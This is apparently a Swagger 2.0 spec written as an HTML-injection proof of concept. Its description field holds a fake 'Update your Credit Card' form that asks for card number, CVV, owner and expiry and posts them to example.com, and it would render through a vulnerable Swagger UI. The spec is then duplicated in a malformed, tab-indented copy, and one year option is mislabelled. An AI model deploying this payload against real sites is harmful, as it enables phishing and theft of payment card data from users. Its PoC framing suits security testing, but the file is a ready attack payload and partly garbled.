danzajork/cc.yaml

## cc.yaml
swagger: '2.0'
info:
  version: 1.0.0
  title: HTML injection PoC
  description: '<div class="creditCardForm">
    <div class="heading">
        <h1>Update your Credit Card</h1>
    </div>
    <div class="payment">
        <form action="https://example.com/" method="post" class="form-signin" id = "login_form">
            <div class="form-group owner">
                <label for="owner">Owner</label>
                <input type="text" name="owner" size="20">
            </div>
            <div class="form-group CVV">
                <label for="cvv">CVV</label>
                <input type="text" name="cvv" size="20">
            </div>
            <div class="form-group" id="card-number-field">
                <label for="cardNumber">Card Number</label>
                <input type="text" name="cardnumber" size="20">
            </div>
            <div class="form-group" id="expiration-date">
                <label>Expiration Date</label>
                <select name="expiration">
                    <option value="01">January</option>
                    <option value="02">February </option>
                    <option value="03">March</option>
                    <option value="04">April</option>
                    <option value="05">May</option>
                    <option value="06">June</option>
                    <option value="07">July</option>
                    <option value="08">August</option>
                    <option value="09">September</option>
                    <option value="10">October</option>
                    <option value="11">November</option>
                    <option value="12">December</option>
                </select>
                <select name="year">
                    <option value="20"> 2020</option>
                    <option value="21"> 2021</option>
                    <option value="22"> 2022</option>
                    <option value="23"> 2021</option>
                </select>
            </div>
            <div class="form-group" id="credit_cards">
            </div>
            <div class="form-group" id="pay-now">
                <button type="submit" class="btn btn-default" id="confirm-purchase">Confirm</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    get:
      responses:
        '200':
          description: Echo GET
	swagger: '2.0'
	info:
	version: 1.0.0
	title: HTML injection PoC
	description: '<div class="creditCardForm">
	<div class="heading">
	<h1>Update your Credit Card</h1>
	</div>
	<div class="payment">
	<form action="https://example.com/" method="post" class="form-signin" id = "login_form">
	<div class="form-group owner">
	<label for="owner">Owner</label>
	<input type="text" name="owner" size="20">
	</div>
	<div class="form-group CVV">
	<label for="cvv">CVV</label>
	<input type="text" name="cvv" size="20">
	</div>
	<div class="form-group" id="card-number-field">
	<label for="cardNumber">Card Number</label>
	<input type="text" name="cardnumber" size="20">
	</div>
	<div class="form-group" id="expiration-date">
	<label>Expiration Date</label>
	<select name="expiration">
	<option value="01">January</option>
	<option value="02">February </option>
	<option value="03">March</option>
	<option value="04">April</option>
	<option value="05">May</option>
	<option value="06">June</option>
	<option value="07">July</option>
	<option value="08">August</option>
	<option value="09">September</option>
	<option value="10">October</option>
	<option value="11">November</option>
	<option value="12">December</option>
	</select>
	<select name="year">
	<option value="20"> 2020</option>
	<option value="21"> 2021</option>
	<option value="22"> 2022</option>
	<option value="23"> 2021</option>
	</select>
	</div>
	<div class="form-group" id="credit_cards">
	</div>
	<div class="form-group" id="pay-now">
	<button type="submit" class="btn btn-default" id="confirm-purchase">Confirm</button>
	</div>
	</form>
	</div>
	</div>'
	paths:
	/:
	get:
	responses:
	'200':
	description: Echo GET